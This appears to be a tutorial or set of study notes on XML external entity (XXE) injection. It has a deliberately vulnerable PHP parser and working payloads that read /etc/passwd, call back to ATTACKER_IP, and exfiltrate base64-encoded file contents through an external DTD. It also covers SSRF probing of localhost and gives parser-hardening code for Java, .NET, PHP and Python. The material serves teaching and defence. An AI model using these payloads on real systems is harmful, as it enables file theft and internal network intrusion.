XXE Injection

Overview

XXE happens when an XML parser processes attacker-controlled external entities. If the parser is configured to resolve those entities, the attacker may be able to read local files, trigger requests to internal or external systems, perform blind exfiltration, or pivot into SSRF-style behavior. These notes cover XML structure, DTDs, entity types, parser behavior, in-band and out-of-band XXE, and common mitigation patterns.

What XML Is

XML is a structured markup format used for data storage, transport, and configuration. It consists of nested elements, attributes, and character data.

<?xml version="1.0" encoding="UTF-8"?>
<user id="1">
   <name>John</name>
   <age>30</age>
   <address>
      <street>123 Main St</street>
      <city>Anytown</city>
   </address>
</user>

In web applications, XML often appears in APIs, SOAP services, uploads, backend integrations, and configuration handling.

DTD and Entities

Document Type Definitions (DTDs) define structure and can also declare entities. XXE exists because XML parsers may resolve external entities during parsing.

<!DOCTYPE config [
  <!ELEMENT config (database)>
  <!ELEMENT database (username, password)>
  <!ELEMENT username (#PCDATA)>
  <!ELEMENT password (#PCDATA)>
]>

Entities are placeholders that can be expanded by the parser:

Why XXE Happens

XXE is usually a parser configuration issue. If the parser accepts external entities and DTD loading, attacker-supplied XML can cause the server to fetch local files or remote resources.

The dangerous combination is typically:

Common XML Parsers

The parser choice matters, but the key security question is always whether external entities and external DTDs are resolved.

In-Band vs Out-of-Band XXE

In-Band XXE Example

Suppose the application parses incoming XML and then reflects the value of the name node back to the user:

libxml_disable_entity_loader(false);

$xmlData = file_get_contents('php://input');
$doc = new DOMDocument();
$doc->loadXML($xmlData, LIBXML_NOENT | LIBXML_DTDLOAD);

$expandedContent = $doc->getElementsByTagName('name')[0]->textContent;
echo "Thank you, " . $expandedContent . "! Your message has been received.";

An XXE payload can point &xxe; at a local file such as /etc/passwd:

<!DOCTYPE foo [
  <!ELEMENT foo ANY >
  <!ENTITY xxe SYSTEM "file:///etc/passwd" >
]>
<contact>
  <name>&xxe;</name>
  <email>test@test.com</email>
  <message>test</message>
</contact>

If the parser expands the entity and the application reflects the value, the file contents are disclosed in-band.

Entity Expansion Abuse

Entity expansion is not only useful for file disclosure. It can also be abused for denial of service through recursive or explosive expansion, often referred to as “Billion Laughs”-style behavior.

<!DOCTYPE foo [
  <!ELEMENT foo ANY >
  <!ENTITY xxe "This is a test message" >
]>
<contact>
  <name>&xxe; &xxe;</name>
  <email>test@test.com</email>
  <message>test</message>
</contact>

Out-of-Band XXE

If the vulnerable endpoint does not return the parsed XML value, you may still be able to prove XXE by forcing the target server to connect to infrastructure you control.

A simple proof-of-interaction payload might reference your listener:

<!DOCTYPE foo [
  <!ELEMENT foo ANY >
  <!ENTITY xxe SYSTEM "http://ATTACKER_IP:1337/" >
]>
<upload><file>&xxe;</file></upload>

If your web server receives a request from the target, you have confirmed external entity resolution even if the application response itself stays generic.

External DTD for Exfiltration

For richer out-of-band exfiltration, attackers often host an external DTD that builds a second entity dynamically and sends file contents back to an attacker-controlled endpoint.

<!ENTITY % cmd SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
<!ENTITY % oobxxe "<!ENTITY exfil SYSTEM 'http://ATTACKER_IP:1337/?data=%cmd;'>">
%oobxxe;

The target then loads that external DTD:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE upload SYSTEM "http://ATTACKER_IP:1337/sample.dtd">
<upload>
    <file>&exfil;</file>
</upload>

If successful, you will typically see one request for the DTD and another request containing the exfiltrated, often base64-encoded, data.

XXE to SSRF

XXE can also become SSRF. If the parser is willing to fetch external URLs, the attacker can direct the server to query internal services that are not accessible externally.

Example internal probing payload:

<!DOCTYPE foo [
  <!ELEMENT foo ANY >
  <!ENTITY xxe SYSTEM "http://localhost:8080/" >
]>
<contact>
  <name>&xxe;</name>
  <email>test@test.com</email>
  <message>test</message>
</contact>

With automation, this can be extended into internal port scanning by varying the port number and watching for response length, timing, or content differences.

Testing Approach

Mitigation

Examples

Java

DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
dbf.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
dbf.setXIncludeAware(false);
dbf.setExpandEntityReferences(false);

.NET

XmlReaderSettings settings = new XmlReaderSettings();
settings.DtdProcessing = DtdProcessing.Prohibit;
settings.XmlResolver = null;

PHP

libxml_disable_entity_loader(true);

Python

from defusedxml.ElementTree import parse
et = parse(xml_input)

Key Takeaways